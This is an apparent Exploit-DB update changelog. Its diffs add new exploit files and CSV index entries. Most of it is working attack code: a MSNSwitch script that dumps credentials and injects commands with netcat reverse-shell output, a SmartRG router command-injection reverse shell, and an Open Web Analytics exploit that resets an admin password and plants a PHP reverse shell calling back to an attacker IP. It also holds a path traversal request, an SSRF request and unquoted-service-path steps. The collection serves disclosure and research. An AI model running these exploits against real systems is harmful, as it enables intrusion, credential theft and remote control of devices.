DB: 2022-11-12

7 changes to exploits/shellcodes/ghdb

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)

SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)

Open Web Analytics 1.7.3 - Remote Code Execution (RCE)

CVAT 2.0 - SSRF (Server Side Request Forgery)

IOTransfer V4 - Unquoted Service Path

NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)

Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

Linux/MIPS - reboot() Shellcode (32 bytes)

Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)

Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)

Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)

exploits/hardware/remote/51027.py

@@ -0,0 +1,102 @@
+Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
+Google Dork: n/a
+Date:9/1/2022
+Exploit Author: Eli Fulkerson
+Vendor Homepage: https://www.msnswitch.com/
+Version: MNT.2408
+Tested on: MNT.2408 firmware
+CVE: CVE-2022-32429
+
+#!/usr/bin/python3
+
+
+"""
+
+POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
+
+Configuration dump only requires HTTP access.
+Full RCE requires you to be on the same subnet as the device.
+
+"""
+
+import requests
+import sys
+import urllib.parse
+import readline
+import random
+import string
+
+
+# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
+LISTENER_HOST = "192.168.EDIT.ME"
+LISTENER_PORT = 3434
+
+# target msnswitch
+TARGET="192.168.EDIT.ME2"
+PORT=80
+
+USERNAME = None
+PASSWORD = None
+
+"""
+First vulnerability, unauthenticated configuration/credential dump
+"""
+if USERNAME == None or PASSWORD == None:
+	# lets just ask
+	hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
+	session = requests.session()
+
+	data = session.get(hack_url)
+	for each in data.text.split('\n'):
+		key = None
+		val = None
+
+		try:
+			key = each.strip().split('=')[0]
+			val = each.strip().split('=')[1]
+		except:
+			pass
+
+		if key == "Account1":
+			USERNAME = val
+		if key == "Password1":
+			PASSWORD = val
+
+"""
+Second vulnerability, authenticated command execution
+
+This only works on the local lan.
+
+for full reverse shell, modify and upload netcat busybox shell script to /tmp:
+
+	shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
+	download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
+
+ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
+"""
+
+session = requests.session()
+
+# initial login, establishes our Cookie
+burp0_url = f"http://{TARGET}:{PORT}/goform/login"
+burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
+burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
+session.post(burp0_url, headers=burp0_headers, data=burp0_data)
+
+# get our csrftoken
+burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
+data = session.get(burp0_url)
+
+csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]
+
+while True:
+	CMD = input('x:')
+	CMD_u = urllib.parse.quote_plus(CMD)
+	filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
+
+	try:
+		hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"
+
+		session.get(hack_url, timeout=0.01)
+	except requests.exceptions.ReadTimeout:
+		pass

exploits/hardware/remote/51028.txt

@@ -0,0 +1,22 @@
+Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
+Exploit Author: Jens Regel (CRISEC IT-Security)
+Date: 11/11/2022
+CVE: CVE-2022-23854
+Version: Access Anywhere Secure Gateway versions 2020 R2 and older
+
+Proof of Concept:
+GET
+/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
+HTTP/1.1
+
+HTTP/1.1 200 OK
+Server: EricomSecureGateway/8.4.0.26844.*
+(..)
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1

exploits/hardware/remote/51031.py

@@ -0,0 +1,50 @@
+# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
+# Date: 13/06/2022
+# Exploit Author: Yerodin Richards
+# Vendor Homepage: https://adtran.com
+# Version: 2.5.15 / 2.6.13 (confirmed)
+# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
+# CVE : CVE-2022-37661
+
+import requests
+from subprocess import Popen, PIPE
+
+router_host =3D "http://192.168.1.1"
+authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"
+
+lhost =3D "lo"
+lport =3D 80
+
+payload_port =3D 81
+
+
+def main():
+    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=
+p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
+    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
+    send_payload(f"|nc {lhost} {payload_port}|sh")
+    print("done.. check shell")
+
+
+def get_session():
+    url =3D router_host + "/admin/ping.html"
+    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
+    r =3D requests.get(url, headers=3Dheaders).text
+    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
+    s =3D ""
+    while r[i] !=3D "'":
+        s =3D s + r[i]
+        i =3D i + 1
+    return s
+
+
+def send_payload(payload):
+    print(payload)
+    url =3D router_host + "/admin/pingHost.cmd"
+    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
+    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=
+: get_session()}
+    requests.get(url, headers=3Dheaders, params=3Dparams).text
+
+
+main()

exploits/php/webapps/51026.py

@@ -0,0 +1,247 @@
+# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
+# Date: 2022-08-30
+# Exploit Author: Jacob Ebben
+# Vendor Homepage: https://www.openwebanalytics.com/
+# Software Link: https://github.com/Open-Web-Analytics
+# Version: <1.7.4
+# Tested on: Linux
+# CVE : CVE-2022-24637
+
+import argparse
+import requests
+import base64
+import re
+import random
+import string
+import hashlib
+from termcolor import colored
+
+def print_message(message, type):
+   if type == 'SUCCESS':
+      print('[' + colored('SUCCESS', 'green') +  '] ' + message)
+   elif type == 'INFO':
+      print('[' + colored('INFO', 'blue') +  '] ' + message)
+   elif type == 'WARNING':
+      print('[' + colored('WARNING', 'yellow') +  '] ' + message)
+   elif type == 'ALERT':
+      print('[' + colored('ALERT', 'yellow') +  '] ' + message)
+   elif type == 'ERROR':
+      print('[' + colored('ERROR', 'red') +  '] ' + message)
+
+def get_normalized_url(url):
+   if url[-1] != '/':
+      url += '/'
+   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
+      url = "http://" + url
+   return url
+
+def get_proxy_protocol(url):
+   if url[0:8].lower() == 'https://':
+      return 'https'
+   return 'http'
+
+def get_random_string(length):
+   chars = string.ascii_letters + string.digits
+   return ''.join(random.choice(chars) for i in range(length))
+
+def get_cache_content(cache_raw):
+   regex_cache_base64 = r'\*(\w*)\*'
+   regex_result = re.search(regex_cache_base64, cache_raw)
+   if not regex_result:
+      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
+      exit()
+   else:
+      cache_base64 = regex_result.group(1)
+   return base64.b64decode(cache_base64).decode("ascii")
+
+def get_cache_username(cache):
+   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
+   return re.search(regex_cache_username, cache).group(1)
+
+def get_cache_temppass(cache):
+   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
+   return re.search(regex_cache_temppass, cache).group(1)
+
+def get_update_nonce(url):
+   try:
+      update_nonce_request = session.get(url, proxies=proxies)
+      regex_update_nonce = r'owa_nonce" value="(\w*)"'
+      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
+   except Exception as e:
+      print_message('An error occurred when attempting to update config!', "ERROR")
+      print(e)
+      exit()
+   else:
+      return update_nonce
+
+parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
+parser.add_argument('TARGET', type=str,
+                  help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
+parser.add_argument('ATTACKER_IP', type=str,
+                  help='Address for reverse shell listener on attacking machine')
+parser.add_argument('ATTACKER_PORT', type=str,
+                  help='Port for reverse shell listener on attacking machine')
+parser.add_argument('-u', '--username', default="admin", type=str,
+                  help='The username to exploit (Default: admin)')
+parser.add_argument('-p','--password', default=get_random_string(32), type=str,
+                  help='The new password for the exploited user')
+parser.add_argument('-P','--proxy', type=str,
+                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
+parser.add_argument('-c', '--check', action='store_true',
+                  help='Check vulnerability without exploitation')
+
+args = parser.parse_args()
+
+base_url = get_normalized_url(args.TARGET)
+login_url = base_url + "index.php?owa_do=base.loginForm"
+password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
+update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
+
+username = args.username
+new_password = args.password
+
+reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
+shell_filename = get_random_string(8) + '.php'
+shell_url = base_url + 'owa-data/caches/' + shell_filename
+
+if args.proxy:
+   proxy_url = get_normalized_url(args.proxy)
+   proxy_protocol = get_proxy_protocol(proxy_url)
+   proxies = { proxy_protocol: proxy_url }
+else:
+   proxies = {}
+
+session = requests.Session()
+
+try:
+   mainpage_request = session.get(base_url, proxies=proxies)
+except Exception as e:
+   print_message('Could not connect to "' + base_url, "ERROR")
+   exit()
+else:
+   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")
+
+if 'Open Web Analytics' not in mainpage_request.text:
+   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
+elif 'version=1.7.3' not in mainpage_request.text:
+   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
+else:
+   print_message('The webserver indicates a vulnerable version!', "ALERT")
+
+try:
+   data = {
+      "owa_user_id": username,
+      "owa_password": username,
+      "owa_action": "base.login"
+   }
+   session.post(login_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred during the login attempt!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Attempting to generate cache for "' + username + '" user', "INFO")
+
+print_message('Attempting to find cache of "' + username + '" user', "INFO")
+
+found = False
+
+for key in range(100):
+   user_id = 'user_id' + str(key)
+   userid_hash = hashlib.md5(user_id.encode()).hexdigest()
+   filename = userid_hash + '.php'
+   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
+   cache_request = requests.get(cache_url, proxies=proxies)
+   if cache_request.status_code != 200:
+      continue;
+   cache_raw = cache_request.text
+   cache = get_cache_content(cache_raw)
+   cache_username = get_cache_username(cache)
+   if cache_username != username:
+      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
+      continue;
+   else:
+      found = True
+      break
+if not found:
+   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
+   exit()
+
+cache_temppass = get_cache_temppass(cache)
+print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")
+
+if args.check:
+   print_message('The system appears to be vulnerable!', "ALERT")
+   exit()
+
+try:
+   data = {
+      "owa_password": new_password,
+      "owa_password2": new_password,
+      "owa_k": cache_temppass,
+      "owa_action":
+      "base.usersChangePassword"
+   }
+   session.post(password_reset_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when changing the user password!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")
+
+try:
+   data = {
+      "owa_user_id": username,
+      "owa_password": new_password,
+      "owa_action": "base.login"
+   }
+   session.post(login_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred during the login attempt!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Logged in as "' + username + '" user', "SUCCESS")
+
+nonce = get_update_nonce(update_config_url)
+
+try:
+   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
+   data = {
+      "owa_nonce": nonce,
+      "owa_action": "base.optionsUpdate",
+      "owa_config[base.error_log_file]": log_location,
+      "owa_config[base.error_log_level]": 2
+   }
+   session.post(update_config_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when attempting to update config!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Creating log file', "INFO")
+
+nonce = get_update_nonce(update_config_url)
+
+try:
+   data = {
+      "owa_nonce": nonce,
+      "owa_action": "base.optionsUpdate",
+      "owa_config[shell]": reverse_shell
+   }
+   session.post(update_config_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when attempting to update config!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Wrote payload to log file', "INFO")
+
+try:
+   session.get(shell_url, proxies=proxies)
+except Exception as e:
+   print(e)
+else:
+   print_message('Triggering payload! Check your listener!', "SUCCESS")
+   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

exploits/python/webapps/51030.txt

@@ -0,0 +1,46 @@
+#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)
+#Exploit Author: Emir Polat
+#Vendor Homepage: https://github.com/opencv/cvat
+#Version: < 2.0.0
+#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
+#CVE: CVE-2022-31188
+
+# Description:
+#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
+#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
+
+POST /api/v1/tasks/2/data HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
+Accept: application/json, text/plain, */*
+Accept-Language:en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
+X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
+Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
+Content-Length: 569
+Origin: http://localhost:8080
+Connection: close
+Referer:http://localhost:8080/tasks/create
+Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------251652214142138553464236533436
+Content-Disposition: form-data; name="remote files[0]"
+
+http://localhost:8081
+-----------------------------251652214142138553464236533436
+Content-Disposition: form-data; name=" image quality"
+
+170
+-----------------------------251652214142138553464236533436
+Content-Disposition: form-data; name="use zip chunks"
+
+true
+-----------------------------251652214142138553464236533436
+Content-Disposition: form-data; name="use cache"
+
+true
+-----------------------------251652214142138553464236533436--

exploits/windows/local/51029.txt

@@ -0,0 +1,36 @@
+# Exploit Title: IOTransfer V4 - Unquoted Service Path
+# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
+# Discovery Date: 2022-28-07
+# Vendor Homepage: http://www.iobit.com/en/index.php
+# Software Link: https://iotransfer.itopvpn.com/download/
+# Tested Version: V4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
+                      Auto
+
+C:\>sc qc IOTUpdaterSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: IOTUpdaterSvc
+        TYPE : 10 WIN32_OWN_PROCESS
+        START_TYPE : 2 AUTO_START
+        ERROR_CONTROL : 1 NORMAL
+        BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
+
+
+LOAD_ORDER_GROUP :
+        TAG : 0
+        DISPLAY_NAME : IOTransfer Updater
+        DEPENDENCIES :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+OS Name: Microsoft Windows Server 2019 Standard Evaluation
+OS Version: 10.0.17763 N/A Build 17763
+OS Manufacturer: Microsoft Corporation

exploits/windows/remote/43408.py

@@ -1,4 +1,4 @@
-#!/usr/bin/pythion
+#!/usr/bin/python
 
 # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
 # CVE: CVE-2017-17968

files_exploits.csv

@@ -3309,6 +3309,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,,
 50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
 17507,exploits/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",remote,hardware,,2011-07-08,2011-07-24,1,OSVDB-73121,,,,,http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
+51028,exploits/hardware/remote/51028.txt,"AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal",2022-11-11,"Jens Regel",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-23854,,,,,
 39194,exploits/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow",2016-01-07,"RedTeam Pentesting",remote,hardware,,2016-01-07,2016-01-07,0,OSVDB-132698,,,,,https://www.redteam-pentesting.de/advisories/rt-sa-2015-001
 7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,remote,hardware,,2009-01-20,,1,OSVDB-51658;OSVDB-51657;OSVDB-51656,,,,,
 36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",remote,hardware,,2011-12-07,2015-03-19,1,CVE-2011-5261;OSVDB-77395,,,,,https://www.securityfocus.com/bid/50968/info
@@ -3712,6 +3713,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2017-11-08,0,,,,,,
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,,2018-04-03,2018-04-03,0,CVE-2017-14459,,,,,https://talosintelligence.com/vulnerability_reports/TALOS-2017-0507
 47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,,2019-10-22,2019-10-22,0,CVE-2019-10969;CVE-2019-10963,,,,,
+51027,exploits/hardware/remote/51027.py,"MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)",2022-11-11,"Eli Fulkerson",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-32429,,,,,
 39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,remote,hardware,,2016-03-23,2016-03-23,0,,,,,,
 35317,exploits/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,remote,hardware,,2011-02-07,2014-11-22,1,OSVDB-72797,,,,,https://www.securityfocus.com/bid/46224/info
 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,,2020-06-25,2020-06-25,0,CVE-2018-11311,,,,,
@@ -3821,6 +3823,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,102,2012-07-14,2012-07-14,0,OSVDB-72870,"Metasploit Framework (MSF)",,,,
 47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,,2019-07-10,2020-06-18,0,,,,,,
 21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware,,2012-09-12,2016-12-04,0,OSVDB-85599;OSVDB-85598,,,,http://www.exploit-db.comSitecomNas.2.4.17.bin,http://www.alcyon.nl/advisories/aa-007
+51031,exploits/hardware/remote/51031.py,"SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)",2022-11-11,"Yerodin Richards",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-37661,,,,,
 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2022-29303,,,,,
 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",2022-06-03,"Ahmed Alroky",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-29298,,,,,
 36205,exploits/hardware/remote/36205.txt,"SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware,,2011-10-04,2019-03-28,1,OSVDB-76147,,,,,https://www.securityfocus.com/bid/49930/info
@@ -24553,6 +24556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",webapps,php,80,2016-08-02,2016-08-02,0,,,,,http://www.exploit-db.comopenupload-0.4.2.tar.gz,
 11903,exploits/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,webapps,php,,2010-03-26,,1,OSVDB-66260;CVE-2010-2677;CVE-2010-2676;OSVDB-63288,,,,,http://www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
 31738,exploits/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",webapps,php,,2014-02-18,2014-02-18,0,CVE-2014-1206;OSVDB-101925,,,,,http://www.secureworks.com/contact/terms_of_use/
+51026,exploits/php/webapps/51026.py,"Open Web Analytics 1.7.3 - Remote Code Execution (RCE)",2022-11-11,"Jacob Ebben",webapps,php,,2022-11-11,2022-11-11,0,CVE-2022-24637,,,,,
 12676,exploits/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",webapps,php,,2010-05-20,,1,OSVDB-65175,,,,,
 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,,2020-05-26,2020-05-26,0,CVE-2020-12261,,,,,
 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",2022-01-10,"Dominic Clark",webapps,php,,2022-01-10,2022-01-10,0,CVE-2021-44916,,,,,
@@ -34114,6 +34118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,,
 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb,
+51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - SSRF (Server Side Request Forgery)",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-11,0,CVE-2022-31188,,,,,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
@@ -39666,6 +39671,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49371,exploits/windows/local/49371.txt,"IObit Uninstaller 10 Pro - Unquoted Service Path",2021-01-06,"Mayur Parmar",local,windows,,2021-01-06,2021-01-06,0,,,,,,
 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,,2019-10-23,2019-10-23,0,,,,,,
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,,2020-06-04,2020-06-04,0,,,,,,
+51029,exploits/windows/local/51029.txt,"IOTransfer V4 - Unquoted Service Path",2022-11-11,"BLAY ABU SAFIAN",local,windows,,2022-11-11,2022-11-11,0,CVE-2022-37197,,,,,
 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,,2020-10-28,2020-10-28,0,,,,,,
 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,Local,,,http://www.exploit-db.comip-tools.exe,
 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,"Buffer Overflow",,,http://www.exploit-db.comip-tools.exe,
@@ -43751,7 +43757,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34831,exploits/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43913/info
 22909,exploits/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,remote,windows,,2003-07-15,2012-11-25,1,,,,,,https://www.securityfocus.com/bid/8197/info
 16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,,2010-10-05,2017-10-05,1,CVE-2005-1323;OSVDB-15865,"Metasploit Framework (MSF)",,,,
-43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2018-01-10,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip,
